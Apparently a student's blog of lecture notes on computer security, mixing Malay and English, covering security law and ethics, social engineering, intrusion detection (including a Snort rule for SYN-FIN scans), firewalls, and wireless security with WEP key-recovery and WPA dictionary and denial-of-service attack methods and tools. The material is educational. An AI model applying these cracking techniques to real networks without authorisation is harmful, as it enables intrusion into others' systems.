Lecture 10 nie last lecture.. sukernyer... yippiieee.... last lecture musti lg semangatt nk abes.. hihihihii... Legal And Ethical Issues In Computer Security yg kami blajar lecture last neh... Topics covered in dis lecture:-
•Legal and Ethical
•Categories of law
•Differences between legal and Ethic
•Ethics concept in Information Security
•Protecting programs and Data
•Information and Law
•This chapter covers information security law and ethics
•First part of this chapter focuses on relevant legislation and regulation
concerning the management of information in an organization
•The second part of the chapter presents ethical issues for information security as
well as a summary of professional organizations with established ethical codes
•This chapter use both as a reference to the legal aspects of information security
and as an aide in planning your professional career
Legal & Ethical
•a rule of conduct or action prescribed or formally recognized as binding or
enforced by a controlling authority
•implies imposition by a sovereign authority and the obligation of obedience on the
part of all subject to that authority
•a set of moral principles or values
•the principles of conduct governing an individual or a group
•an objectively defined standard of right and wrong
Categories Of Law
•Civil law: represents a wide variety of laws that govern a nation or state
•Criminal law: addresses violations harmful to society and is actively enforced
through prosecution by the state
•Tort law enables individuals to seek recourse against others in the event of
personal, physical, or financial injury.
-Torts are enforced via individual lawsuits rather than criminal prosecutions by
the state. When someone brings a legal action under tort law, personal attorneys
present the evidence and argue the details rather than representatives of the
state, who prosecute criminal cases.
•The categories of laws that affect the individual in the workplace are private law
and public law.
-Private law regulates the relationship between the individual and the
organization, and encompasses family law, commercial law, and labor law.
-Public law regulates the structure and administration of government agencies and
their relationships with citizens, employees, and other governments, providing
careful checks and balances. Examples of public law include criminal,
administrative, and constitutional law
Law And Ethics
•Laws are rules that mandate or prohibit certain behavior in society
•ethics, which define socially acceptable behaviors.
•The key difference between laws and ethics is that laws carry the sanctions of a
governing authority and ethics do not. Ethics in turn are based on cultural mores:
the fixed moral attitudes or customs of a particular group.
•Some ethics are recognized as universal. For example,murder, theft, assault, and
arson are commonly accepted as actions that deviate from ethical and legal codes in
the civilized world.
Differences Between Laws And Ethics
•Interpreted by courts
•Established by legislature representing everyone
•Applicable to everyone
•Priority determined by courts if two laws conflict
•Enforceable by police and courts
•Described by unwritten principles
•Interpreted by individuals
•Presented by philosophers, religions, professional group
•Priority determined by individual if two principles conflict
Ethics Concept In Information Security
~Ethical Differences Across Cultures
•Cultural differences can make it difficult to determine what is and is not ethical
especially when considering the use of computers.
•individuals of different nationalities have different perspectives; difficulties
arise when one nationality’s ethical behavior conflicts with the ethics of another
•For example, to Western cultures, many of the ways in which Asian cultures use
computer technology is software piracy. This ethical conflict arises out of Asian
traditions of collective ownership, which clash with the protection of
~Software License Infringement
•the individuals surveyed understood what software license infringement was but
felt either that their use was not piracy, or that their society permitted this
piracy in some way
•the lack of legal disincentives, the lack of punitive measures, or any one of a
number of other reasons could also explain why these alleged piracy centers were
not oblivious to intellectual property laws
•The individuals studied unilaterally condemned viruses, hacking, and other forms
of system abuse as unacceptable behavior
•The low overall degree of tolerance for illicit system use may be a function of
the easy association between the common crimes of breaking and entering,
trespassing, theft, and destruction of property to their computer-related
~Misuse of Corporate Resources
•Individuals displayed a rather lenient view of personal use of company equipment.
•A range of views within the acknowledgement of ethical versus unethical behavior
as to whether or not some actions are moderately or highly acceptable
~Ethics and Education
•Differences in the ethics of computer use are not exclusively international.
•Differences are found among individuals within the same country, within the same
social class, and within the same company
~Deterrence to Unethical and Illegal Behavior
•It is the responsibility of information security personnel to do everything in
their power to deter these acts and to use policy, education and training, and
technology to protect information and systems
•Three general categories of unethical and illegal behavior:
~Three general categories of unethical and illegal behavior:
~ignorance of the law is no excuse, however ignorance of policy and procedures is
~Individuals with authorization and privileges to manage information within the
organization are most likely to cause harm or damage by accident
~Intent is often the cornerstone of legal defense, when it becomes necessary to
determine whether or not the offender acted out of ignorance, by accident, or
with specific intent to cause harm or damage
•Deterrence is the best method for preventing an illegal or unethical activity.
Laws, policies, and technical controls are all examples of deterrents. However, it
is generally agreed that laws and policies and their associated penalties only
deter if three conditions are present
~Fear of penalty: The individual intending to commit the act must fear the
penalty. Threats of informal reprimand or verbal warnings may not have the same
impact as the threat of imprisonment or forfeiture of pay.
~Probability of being caught: The individual has to believe there is a strong
possibility of being caught performing the illegal or unethical act. Penalties
can be severe, but the penalty will not deter the behavior unless there is an
expectation of being caught.
~Probability of penalty being administered: The individual must believe that the
penalty will in fact be administered.
Protecting Programs And Data
•designed to protect the expression of ideas
•applies to a creative work such as a story and song.
•intended to allow regular and free exchange of ideas
•must apply to an original work and it must be in some tangible medium of
•to cover works in the arts, literature and written scholarship
•applies to the result of science, technology and engineering
•can protect a “new and useful process, machine, manufacture or composition of
•designed to protect the device or process for carrying out an idea, not the idea
•must be kept a secret
•the owner must protect the secret by any means, such as by storing it in a safe,
encrypting it and by making employees sign a statement that they will not
disclose the secret
•trade secret protection can also vanish through reverse engineering
Open-Source Software Affected By Copyright Protection, How?
•Controls the right to copy the software
•Controls the right to distribute the software
•Subject to fair use
•Ease of filing
•Sue if copy sold
•Ownership of copyright
Information And The Law
~Information as an Object
-Information can be sold again and again without depleting stock or diminishing
-Information has the value not the medium
•can be replicated
-Can use the information and sell it many times
•minimal margin cost
-The cost to produce another one after having produced others is small
•value is timely
-The value of information often depends on when you know it
•often transferred intangibly
-Information is being delivered as bits on a cable
~Legal Issues Related to Information
-Is the basis of some commerce
~how to ensure that the software developer or publisher receives just
compensation for use of the software?
~Legal Issues Related to Information
-Some news and information will be published and distributed on the Internet or
some other public network
~How to ensure that the publisher receives fair compensation for the work?
-By using cryptographic-based technical solutions and supported by a legal
~Legal Issues Related to Information
~Difficult to determine that a set of data came from a particular database
so that the database can claim compensation
-Goods are ordered electronically
-Technical protection available:
~Digital signatures and other cryptographic protocols
-How to prove conditions of delivery
Rights Of Employees And Employers
~ownership of a patent
•The person who owns a work under patent and copyright law is inventor (producer)
~ownership of a copyright
•Similar to ownership of a patent
•The programmer is the presumed owner of the work
•The owner has all rights to an object
~work for hire
•The employer is considered the author of a work not the employee
•An alternative to ‘work for hire’ arrangement
•Programmer develops and retain full ownership of the software
•The programmer grants a license to a company to use the program
•License can be:
-For a copy or unlimited copies
-To be used at one location or many
~trade secret protection
•Trade secret is not registered
•The ownership must be established
•The information as confidential data
•Will express the rights of ownership
-The employee is hired to work as a programmer exclusively for the benefit of
-The company states that it is a work for hire situation
-The company claims all rights to any programs developed including all
copyrights and the right to market
-The employee receives access to certain trade secrets as a part of employment
and the employees agrees not to reveal those secrets
-Sometimes an agreement not to compute is included such as the employee is not
to compete by working in the same field for a set period of time after
~A computer can be :
•used to attack
•used as a means to commit crime
~Computer crime is hard to prosecute because:
•low computer literacy (lack of understanding)
•no physical clues (lack of physical evidence)
•intangible forms of assets
•considered as juvenile crime
•Lack of political impact
Ethical Issues In Computer Security
Examining A Case For Ethical Issues
1. Understand the situation. Determine the issues involved.
2. Know several theories of ethical reasoning
3. List the ethical principles involved
4. Determine which principles outweigh others.
~Laws are formally adopted rules for acceptable behavior in modern society. Ethics
are socially acceptable behaviors. The key difference between laws and ethics is
that laws carry the sanction of a governing authority and ethics do not.
~Organizations formalize desired behaviors in documents called policies. Policies
must be read and agreed to before they are binding.
~Civil law represents a wide variety of laws that are used to govern a nation or
state. Criminal law addresses violations that harm society and are enforced by
agents of the state or nation. Tort law is conducted by means of individual
lawsuits rather than criminal prosecution by the state.
~Private law focuses on individual relationships, public law addresses regulatory
~Deterrence can prevent an illegal or unethical activity from occurring. Deterrence
requires significant penalties, a high probability of apprehension, and an
expectation of enforcement of penalties.
~As part of an effort to encourage positive ethics, a number of professional
organizations have established codes of conduct or codes of ethics that their
members are expected to follow.
Finally, abes gak lecture network security kiteorg... ermmm.. time to study n prepare for final exam lor.. uhukksss.... Gud Luck all...
A cruel word may wreck a life
A timely word may level stress
A loving word may heal and bless"
Have you thought about a social engineering attack? What about the users who use your network on a daily basis? Are you prepared in dealing with attacks by these people?
Believe it or not, the weakest link in your security plan is the people who use your network. For the most part, users are uneducated on the procedures to identify and neutralize a social engineering attack. What’s going to stop a user from finding a CD or DVD in the lunch room and taking it to their workstation and opening the files? This disk could contain a spreadsheet or word processor document that has a malicious macro embedded in it. The next thing you know, your network is compromised.
This problem exists particularly in an environment where a help desk staff reset passwords over the phone. There is nothing to stop a person intent on breaking into your network from calling the help desk, pretending to be an employee, and asking to have a password reset. Most organizations use a system to generate usernames, so it is not very difficult to figure them out.
Why would an attacker go to your office or make a phone call to the help desk? Simple, it is usually the path of least resistance. There is no need to spend hours trying to break into an electronic system when the physical system is easier to exploit. The next time you see someone walk through the door behind you, and do not recognize them, stop and ask who they are and what they are there for. If you do this, and it happens to be someone who is not supposed to be there, most of the time he will get out as fast as possible. If the person is supposed to be there then he will most likely be able to produce the name of the person he is there to see.
I know you are saying that I am crazy, right? Well think of Kevin Mitnick. He is one of the most decorated hackers of all time. The US government thought he could whistle tones into a telephone and launch a nuclear attack. Most of his hacking was done through social engineering. Whether he did it through physical visits to offices or by making a phone call, he accomplished some of the greatest hacks to date. If you want to know more about him Google his name or read the two books he has written.
dikarang oleh Azma Green
Lecture 9 nie xbyk sgt daaa pn... ermmm... Inie kelas bab Intrusion Detection System.. Hmmm... Topic yg cover lam lecture nie :-
•Security Intrusion & Detection
•Types of IDS
•significant issue hostile/unwanted trespass
~from benign to serious
~unauthorized logon, privilege abuse
~virus, worm, or trojan horse
•classes of intruders:
–masquerader, misfeasor, clandestine user
Examples of Intrusion
•remote root compromise
•web server defacement
•guessing / cracking passwords
•copying viewing sensitive data / databases
•running a packet sniffer
•distributing pirated software
•using an unsecured modem to access net
•impersonating a user to reset password
•using an unattended workstation
Security Intrusion & Detection
a security event, or combination of multiple security events, that constitutes a security incident in which an intruder gains, or attempts to gain, access to a system (or system resource) without having authorization to do so.
a security service that monitors and analyzes system events for the purpose of finding, and providing real-time or near real-time warning of attempts to access system resources in an unauthorized manner.
~motivated by thrill of access and status
•hacking community a strong meritocracy
•status is determined by level of competence
~benign intruders might be tolerable
•do consume resources and may slow performance
•can’t know in advance whether benign or malign
~IDS / IPS / VPNs can help counter
~awareness led to establishment of CERTs
•collect / disseminate vulnerability info / responses
Intrusion Detection Systems
~classify intrusion detection systems (IDSs) as:
•Host-based IDS: monitor single host activity
•Network-based IDS: monitor network traffic
•sensors - collect data
•analyzers - determine if intrusion has
•user interface - manage / direct / view IDS
•assume intruder behavior differs from
~expect overlap as shown
•from past history
•be fault tolerant
•impose a minimal overhead on system
•configured according to system security policies
•adapt to changes in systems and users
•scale to monitor large numbers of systems
•provide graceful degradation of service
•allow dynamic reconfiguration
Types of IDS
•specialized software to monitor system activity to
•detect suspicious behavior
~primary purpose is to detect intrusions, log suspicious
~events, and send alerts
~can detect both external and internal intrusions
•two approaches, often used in combination:
~anomaly detection - defines normal/expected behavior
•signature detection - defines proper behavior
•a fundamental tool for intrusion detection
~native audit records - provided by O/S
•always available but may not be optimum
~detection-specific audit records - IDS specific
•additional overhead but specific to IDS task
•often log individual elementary actions
•e.g. may contain fields for: subject, action, object, exception-condition,
~network-based IDS (NIDS)
•monitor traffic at selected points on a network
•in (near) real time to detect intrusion patterns
•may examine network, transport and/or application level protocol activity directed
~comprises a number of sensors
•inline (possibly as part of other net device)
•passive (monitors copy of traffic)
NIDS Sensor Deployment
Distributed Host-Based IDS
Intrusion Detection Techniques
•at application, transport, network layers; unexpected application services, policy
•of denial of service attacks, scanning, worms
~when potential violation detected sensor sends an alert and logs information
•used by analysis module to refine intrusion detection parameters and algorithms
•by security admin to improve protection
• checks excessive event occurrences over time
• alone a crude and ineffective intruder detector
• must determine both thresholds and time intervals
• characterize past behavior of users / groups
• then detect significant deviations
• based on analysis of audit records
*gather metrics: counter, guage, interval timer, resource utilization
*analyze: mean and standard deviation, multivariate, markov process, time series,
~observe events on system and applying a set
~of rules to decide if intruder
•rule-based anomaly detection
*analyze historical audit records for expected behavior, then match with current
•rule-based penetration identification
*rules identify known penetrations / weaknesses
*often by analyzing attack scripts from Internet
*supplemented with rules from security experts
IDS in the market
•real-time packet capture and rule analysis
•passive or inline
~use a simple, flexible rule definition language
~with fixed header and zero or more options
~header includes: action, protocol, source IP, source port, direction, dest IP, dest
~example rule to detect TCP SYN-FIN attack:
Alert tcp $EXTERNAL_NET any -> $HOME_NET any \ (msg: "SCAN SYN FIN"; flags: SF, 12 ; \ reference: arachnids, 198; classtype: attempted-recon;)
~are decoy systems
-filled with fabricated info
-instrumented with monitors / event loggers
-divert and hold attacker to collect activity info
-without exposing production systems
~initially were single systems
~more recently are/emulate entire networks
Hmm... xbyk sgt kn lecture kiteorg kali nie.. ermm... xla busann sgt... ermmm.. best!...
dikarang oleh Azma Green
Lecture 8 nie da byk kali gak kot blajar mender alah nie.. ermm... Bab Firewall.. Encek zaki cakap dinding berapi... nnt biler dia nk wat soklan exam musti kiter akan jumper dinding berapi lam versi bm la... biaser gak la blajar before2 nie... huhuhuhu... berapi benau dinding tue... Topic yg der lam lecture nie antarenyer...
~Firewall Capabilities & Limits
~Types of firewall
•Packet Filtering Firewall
•Stateful Inspection Firewall
•Application-Level Gateway(Application Proxy)
Introduction to Firewall
~effective means of protecting LANs
~internet connectivity essential
•for organization and individuals
•but creates a threat
~could secure workstations and servers
~also use firewall as perimeter defence
•single choke point to impose security
Firewall Capabilities & Limits
~defines a single choke point that keeps unauthorized users out of the protected
~provides a location for monitoring security events
~convenient platform for some Internet functions such as NAT, usage monitoring,
~cannot protect against attacks bypassing firewall
~may not protect fully against internal threats
~improperly secure wireless LAN may be accessed from outside the org
~laptop, PDA, portable storage device infected outside then used inside
Types of firewall
Type 1- Packet Filtering Firewall
•applies rules to packets in/out of firewall
•based on information in packet header
~src/dest IP addr & port, IP protocol, interface
•typically a list of rules of matches on fields
~if match rule says if forward or discard packet
•two default policies:
~discard - prohibit unless expressly permitted
•more conservative, controlled, visible to users
~forward - permit unless expressly prohibited
•easier to manage/use but less secure
Packet Filter Rules
A. Inbound mail is allowed (port 25 is for SMTP incoming), but only to a gateway
host. However, packets from a particular external host, SPIGOT, are blocked.
B. This is an explicit statement of the default policy, usually implicitly the last
C. This rule set is intended to specify that any inside host can send mail to the
outside. A TCP packet with a destination port of 25 is routed to the SMTP server
on the destination machine. Problem is that 25 as SMTP is only a default; an
outside machine could be configured to have some other application linked to port
D. This rule set achieves the intended result that was not achieved in C. This rule
set allows IP packets where the source IP address is one of a list of designated
internal hosts and the destination TCP port number is 25. It also allows incoming
packets with a source port number of 25 that include the ACK flag. This takes
advantage of a feature of TCP connections that once set up, the ACK flag of a TCP
segment is set to acknowledge segments sent from the other side.
E. This rule set is one approach to handling FTP which uses two TCP connections: a
control connection and a data connection for the actual file transfer. The data
connection uses a different dynamically assigned port number for the transfer.
Most servers, and hence most attack targets, live on low-numbered ports; most
outgoing calls tend to use a higher-numbered port, typically above 1023. Rule
set E points out the difficulty in dealing with applications at the packet
Packet Filter Weaknesses
~cannot prevent attack on application bugs
~limited logging functionality
~do no support advanced user authentication
~vulnerable to attacks on TCP/IP protocol bugs (network address spoofing)
~improper configuration can lead to breaches
Packet Filter Attacks
~IP address spoofing: The intruder transmits packets from the outside with a source
IP address field containing an address of an internal(assumed trusted) host. The
countermeasure is to discard external packets with an inside source address
~source route attacks: specifies the route that a packet should take as it crosses
the Internet. The countermeasure is to discard all packets that use this option.
~tiny fragment attacks: intruder uses the IP fragmentation option to create
extremely small fragments and force the TCP header information into a separate
packet fragment, filter rules that specify patterns for those fields of header will
not match. It can be defeated by requiring that the first fragment contain most of
the transport header.
Type 2 - Stateful Inspection Firewall
~reviews packet header information but also keeps info on TCP connections
•applications use TCP and create sessions and typically have low, “well-known” port
no (<1024) for connecting a server
•and high, dynamically assigned port no (1024-65535) for the hosts that make the
•simple packet filter must allow all return high port numbered packets back in
•stateful inspection packet firewall tightens rules for TCP traffic using a
directory of TCP connections
•only allow incoming traffic to high-numbered ports for packets matching an entry
in this directory
•may also track TCP seq numbers as well
Only allow incoming traffic to high-numbered ports for packets matching an entry in this directory
Type 3 - Application-Level Gateway(Application Proxy)
~acts as a relay of application-level traffic
•user contacts gateway with remote host name
•authenticates the users (valid user id & password)
•gateway contacts application on remote host and relays TCP segments between server
~must have proxy code for each application
•is installed on the gateway for each desired application
•may configure to restrict application features supported
•frequent software updating to ensure that they are running latest versions of the
~more secure than packet filters
~but have higher overheads
Type 4 - Circuit-Level Gateway
•a circuit-level gateway does not permit an end to end TCP connection
•sets up two TCP connections, between itself to an inside user and between itself
to an outside host
•The security function consists of determining which connections will be allowed.
•relays TCP segments from one connection to the other without examining contents
~hence independent of application logic
~just determines whether relay is permitted
•typically used when inside users trusted
~may use application-level gateway inbound and circuit-level gateway outbound
~hence lower overheads
•critical strongpoint in network’s security
•hosts application-level/circuit-level gateways
~runs secure O/S, only essential services
~may require user auth to access proxy or host
~each proxy can restrict features, hosts accessed
~each proxy small, simple, checked for security
~each proxy is independent, non-privileged
~limited disk use, hence read-only code
•used to secure individual host
•available in/add-on for many O/S
•filter packet flows
•often used on servers
~taylored filter rules for specific host needs
~protection from both internal / external attacks
~additional layer of protection to org firewall
~controls traffic flow to/from PC/workstation
~for both home or corporate use
~may be software module on PC
~or in home cable/DSL router/gateway
~typically much less complex
~primary role to deny unauthorized access
~may also monitor outgoing traffic to detect/block worm/malware activity
• An external firewall is placed at the edge of a local or enterprise network.
• One or more internal firewalls protect the bulk of the enterprise network.
• Between these two types of firewalls are one or more networked devices in a region
referred to as a DMZ (demilitarized zone) network. Systems that are externally
accessible but need some protections are usually located on DMZ networks.
Virtual Private Networks (VPNs)
• In essence, a VPN consists of a set of computers that interconnect by means of a
relatively unsecure network.
• Use of a public network exposes corporate traffic to eavesdropping and provides an
entry point for unauthorized users. To counter this problem, a VPN is needed.
• In essence, a VPN uses encryption and authentication in the lower protocol layers
to provide a secure connection through an otherwise insecure network, typically
• VPNs are generally cheaper than real private networks using private lines but rely
on having the same encryption and authentication system at both ends.
• The encryption may be performed by firewall software or possibly by routers.
• The most common protocol mechanism used for this purpose is at the IP level and is
known as IPSec.
• A distributed firewall configuration involves standalone firewall devices plus
host-based firewalls, personal firewall working together under a central
• Administrators can configure host-resident firewalls on hundreds of servers and
workstation as well as configuring personal firewalls on local and remote user
systems. Tools let the network administrator set policies and monitor security
across the entire network.
Yuhuuu.. tue jer laa yg kami blajar pasal firewall.. utk keterangan lanjut surf la lagi tenet.. musti byk lg infoo.. yihiiii...
dikarang oleh Azma Green
Lam lecture kali nie encek ajr kami Wireless Security.. ermmmm... best gak lecture kali nie.. xla busannn.. ermm...
•IEEE ratified 802.11 in 1997.
~Also known as Wi-Fi.
•Wireless LAN at 1 Mbps & 2 Mbps.
•WECA (Wireless Ethernet Compatibility Alliance) promoted Interoperability.
~Now Wi-Fi Alliance
•802.11 focuses on Layer 1 & Layer 2 of OSI model.
~Data link layer
~Two pieces of equipment defined:
*A desktop or laptop PC or PDA with a wireless NIC.
*A bridge between wireless and wired networks
~Wired network interface (usually 802.3)
*Aggregates access for multiple wireless stations to wired network.
•Basic Service Set (BSS)
*One access point
•Extended Service Set
*Two or more BSSs forming a single subnet.
•Most corporate LANs in this mode.
•Also called peer-to-peer.
•Independent Basic Service Set
•Set of 802.11 wireless stations that communicate directly without an access point.
*Useful for quick & easy wireless networks.
802.11 Physical Layer
~Originally three alternative physical layers
•Two incompatible spread-spectrum radio in 2.4Ghz ISM band
*Frequency Hopping Spread Spectrum (FHSS)
*Direct Sequence Spread Spectrum (DSSS)
~14 channels (11 channels in US)
•One diffuse infrared layer
*1 Mbps or 2 Mbps.
802.11 Data Link Layer
~Layer 2 split into:
•Logical Link Control (LLC).
•Media Access Control (MAC).
~LLC - same 48-bit addresses as 802.3.
~MAC - CSMA/CD not possible.
•Can’t listen for collision while transmitting.
~CSMA/CA – Collision Avoidance.
•Sender waits for clear air, waits random time, then sends data.
•Receiver sends explicit ACK when data arrives intact.
•Also handles interference.
•But adds overhead.
~802.11 always slower than equivalent 802.3
RTS / CTS
~To handle hidden nodes
~Sending station sends
•“Request to Send”
~Access point responds with
•“Clear to Send”
•All other stations hear this and delay any transmissions.
~Only used for larger pieces of data.
•When retransmission may waste significant time.
•802.11b ratified in 1999 adding 5.5 Mbps and 11 Mbps.
•DSSS as physical layer.
~11 channels (3 non-overlapping)
•Dynamic rate shifting.
~Transparent to higher layers
~Ideally 11 Mbps.
~Shifts down through 5.5 Mbps, 2 Mbps to 1 Mbps.
~Shifts back up when possible.
•Maximum specified range 100 meters
•Average throughput of 4Mbps
Joining a BSS
•When 802.11 client enters range of one or more APs
~APs send beacons.
~AP beacon can include SSID.
~AP chosen on signal strength and observed error rates.
~After AP accepts client.
*Client tunes to AP channel.
•Periodically, all channels surveyed.
~To check for stronger or more reliable APs.
~If found, re-associates with new AP.
Roaming and Channels
~Re-association with APs
•Moving out of range.
•High error rates.
•High network traffic.
*Allows load balancing.
~Each AP has a channel.
•14 partially overlapping channels.
•Only three channels that have no overlap.
*Best for multi cell coverage.
~802.11a ratified in 2001
~Supports up to 54Mbps in 5 Ghz range.
•Higher frequency limits the range
•Regulated frequency reduces interference from other devices
~12 non-overlapping channels
~Usable range of 30 metres
~Average throughput of 30 Mbps
~Not backwards compatible
~802.11g ratified in 2002
~Supports up to 54Mbps in 2.4Ghz range.
•Backwards compatible with 802.11b
~3 non-overlapping channels
~Range similar to 802.11b
~Average throughput of 30 Mbps
~802.11n due for November 2006
•Aiming for maximum 200Mbps with average 100Mbps
Open System Authentication
~Service Set Identifier (SSID)
~Station must specify SSID to Access Point when requesting association.
~Multiple APs with same SSID form Extended Service Set.
~APs can broadcast their SSID.
~Some clients allow * as SSID.
•Associates with strongest AP regardless of SSID.
MAC ACLs and SSID hiding
~Access points have Access Control Lists (ACL).
~ACL is list of allowed MAC addresses.
•E.g. Allow access to:
~But MAC addresses are sniffable and spoofable.
~AP Beacons without SSID
*sends deauthenticate frames to client
*SSID then displayed when client sends reauthenticate frames
•Wireless LAN uses radio signal.
•Not limited to physical building.
•Signal is weakened by:
•Directional antenna allows interception over longer distances.
•Directional antenna provides focused reception.
802.11 Wireless LAN
~Three basic security services defined by IEEE for the WLAN environment
*provide a security service to verify the identity of communicating client
*to ensure that messages are not modified in transit between the wireless
clients and the access point in an active attack
•to provide “privacy achieved by a wired network”
802.11b Security Services
~Two security services provided:
*Shared Key Authentication
*Wired Equivalence Privacy
Wired Equivalence Privacy
~Shared key between
•An Access Point.
~Extended Service Set
•All Access Points will have same shared key.
~No key management
•Shared key entered manually into
*Key management nightmare in large wireless LANs
~Ron’s Code number 4
•Symmetric key encryption
•RSA Security Inc.
•Designed in 1987.
•Trade secret until leak in 1994.
~RC4 can use key sizes from 1 bit to 2048 bits.
~RC4 generates a stream of pseudo random bits
•XORed with plaintext to create ciphertext.
WEP – Sending
~Compute Integrity Check Vector (ICV).
•32 bit Cyclic Redundancy Check.
•Appended to message to create plaintext.
~Plaintext encrypted via RC4
•Plaintext XORed with long key stream of pseudo random bits.
•Key stream is function of
~40-bit secret key
~24 bit initialisation vector
~Ciphertext is transmitted.
WEP – Receiving
~Ciphertext is received.
~Ciphertext decrypted via RC4
•Ciphertext XORed with long key stream of pseudo random bits.
•Key stream is function of
~40-bit secret key
~24 bit initialisation vector (IV)
•Separate ICV from message.
•Compute ICV for message
•Compare with received ICV
Shared Key Authentication
~When station requests association with Access Point
•AP sends random number to station
•Station encrypts random number
•Uses RC4, 40 bit shared secret key & 24 bit IV
•Encrypted random number sent to AP
•AP decrypts received message
•Uses RC4, 40 bit shared secret key & 24 bit IV
•AP compares decrypted random number to transmitted random number
~If numbers match, station has shared secret key.
~Shared secret key required for:
•Associating with an access point.
~Messages are encrypted.
~Messages have checksum.
~But management traffic still broadcast in clear containing SSID.
~IV must be different for every message transmitted.
~802.11 standard doesn’t specify how IV is calculated.
~Wireless cards use several methods
•Some use a simple ascending counter for each message.
•Some switch between alternate ascending and descending counters.
•Some use a pseudo random IV generator.
Passive WEP attack
~If 24 bit IV is an ascending counter,
~If Access Point transmits at 11 Mbps,
~All IVs are exhausted in roughly 5 hours.
•Attacker collects all traffic
•Attacker could collect two messages:
*Encrypted with same key and same IV
*Statistical attacks to reveal plaintext
*Plaintext XOR Ciphertext = Keystream
Active WEP attack
~If attacker knows plaintext and ciphertext pair
•Keystream is known.
•Attacker can create correctly encrypted messages.
•Access Point is deceived into accepting messages.
•Flip a bit in ciphertext
•Bit difference in CRC-32 can be computed
Limited WEP keys
~Some vendors allow limited WEP keys
•User types in a passphrase
•WEP key is generated from passphrase
•Passphrases creates only 21 bits of entropy in 40 bit key.
~Reduces key strength to 21 bits = 2,097,152
~Remaining 19 bits are predictable.
~21 bit key can be brute forced in minutes.
Creating limited WEP keys
Brute force key attack
~IV is included in message.
•Search all 240 possible secret keys.
~170 days on a modern laptop
•Find which key decrypts ciphertext to plaintext.
128 bit WEP
~Vendors have extended WEP to 128 bit keys.
•104 bit secret key.
•24 bit IV.
~Brute force takes 10^19 years for 104-bit key.
~Effectively safeguards against brute force attacks.
~WEP exposes part of PRNG input.
•IV is transmitted with message.
•Every wireless frame has reliable first byte
*Sub-network Access Protocol header (SNAP) used in logical link control layer,
upper sub-layer of data link layer.
*First byte is 0xAA
*Capture packets with weak IV
*First byte ciphertext XOR 0xAA = First byte key stream
*Can determine key from initial key stream
~Practical for 40 bit and 104 bit keys
•First tool to demonstrate attack using IV weakness.
~Open source, Anton Rager.
~Weaker IV generator.
~Search sniffer output for weaker IVs & record 1st byte.
~Cracker to combine weaker IVs and selected 1st bytes.
•Cypher42, Minnesota, USA.
•Does it all!
•Searches for weaker IVs
•Records encrypted data
•Until key is derived.
~100 Mb to 1 Gb of transmitted data.
~3 to 4 hours on a very busy WLAN.
Avoid the weak IVs
•FMS described a simple method to find weak IVs
~Many manufacturers avoid those IVs after 2002
~Therefore Airsnort and others may not work on recent hardware
•However David Hulton aka h1kari
~Properly implemented FMS attack which shows many more weak IVs
~Identified IVs that leak into second byte of key stream.
~Second byte of SNAP header is also 0xAA
~So attack still works on recent hardware
~And is faster on older hardware
~Dwepcrack, weplab, aircrack
Generating WEP traffic
•Not capturing enough traffic?
~Capture encrypted ARP request packets
~Anecdotally lengths of 68, 118 and 368 bytes appear appropriate
~Replay encrypted ARP packets to generate encrypted ARP replies
~Aireplay implements this.
•Security Policy & Architecture Design
•Treat as untrusted LAN
•Discover unauthorised use
•Access point audits
•Access point location
Security Policy & Architecture
•Define use of wireless network
~What is allowed
~What is not allowed
•Holistic architecture and implementation
~Consider all threats.
~Design entire architecture
•To minimize risk.
Wireless as untrusted LAN
~Treat wireless as untrusted.
•Similar to Internet.
~Firewall between WLAN and Backbone.
~Extra authentication required.
•at WLAN / Backbone junction.
Discover unauthorized use
•Search for unauthorised access points, ad-hoc networks or clients.
~For unknown SNMP agents.
~For unknown web or telnet interfaces.
~Sniff 802.11 packets
~Identify IP addresses
~Detect signal strength
~But may sniff your neighbours…
•Wireless Intrusion Detection
~AirMagnet, AirDefense, Trapeze, Aruba,…
Access point audits
•Review security of access points.
•Are passwords and community strings secure?
•Use Firewalls & router ACLs
~Limit use of access point administration interfaces.
•Standard access point config:
~Community string & password policy
~Protect the station from attackers.
•VPN from station into Intranet
~End-to-end encryption into the trusted network.
~But consider roaming issues.
•Host intrusion detection
~Provide early warning of intrusions onto a station.
~Check that stations are securely configured.
Location of Access Points
•Ideally locate access points
~In centre of buildings.
•Try to avoid access points
~On external walls
~Line of sight to outside
•Use directional antenna to “point” radio signal.
•Wi-Fi Protected Access
~Works with 802.11b, a and g
•“Fixes” WEP’s problems
•Existing hardware can be used
•802.1x user-level authentication
~RC4 session-based dynamic encryption keys
~Per-packet key derivation
~Unicast and broadcast key management
~New 48 bit IV with new sequencing method
~Michael 8 byte message integrity code (MIC)
•Optional AES support to replace RC4
WPA and 802.1x
~802.1x is a general purpose network access control mechanism
~WPA has two modes
•Pre-shared mode, uses pre-shared keys
•Enterprise mode, uses Extensible Authentication Protocol (EAP) with a RADIUS
server making the authentication decision
•EAP is a transport for authentication, not authentication itself
•EAP allows arbitrary authentication methods
•For example, Windows supports
~EAP-TLS requiring client and server certificates
Practical WPA attacks
•Dictionary attack on pre-shared key mode
~CoWPAtty, Joshua Wright
•Denial of service attack
~If WPA equipment sees two packets with invalid MICs in 1 second
•All clients are disassociated
•All activity stopped for one minute
•Two malicious packets a minute enough to stop a wireless network
•WAP is used on small, handheld devices like cell phones for out-of-the-office
•Designers created WTLS (Wireless Transport Layer Security) as a method to ensure
privacy of the data because it was being broadcast
•802.11 does not allow physical control of the transport mechanism
•Transmission of all network data wirelessly transmits frames to all wireless
machines, not just a single client
•Poor authentication. The SSID is broadcast to anyone listening
•Flawed implementation of the RC4 encryption algorithm makes even encrypted traffic
subject to interception and decryption
•WEP is used to encrypt wireless communications in an 802.11 environment and S/MIME
huhuhuuu.. quite byk gak la mender yg nk kne ingt lam lecture nie.. ermmm.. layann....
dikarang oleh Azma Green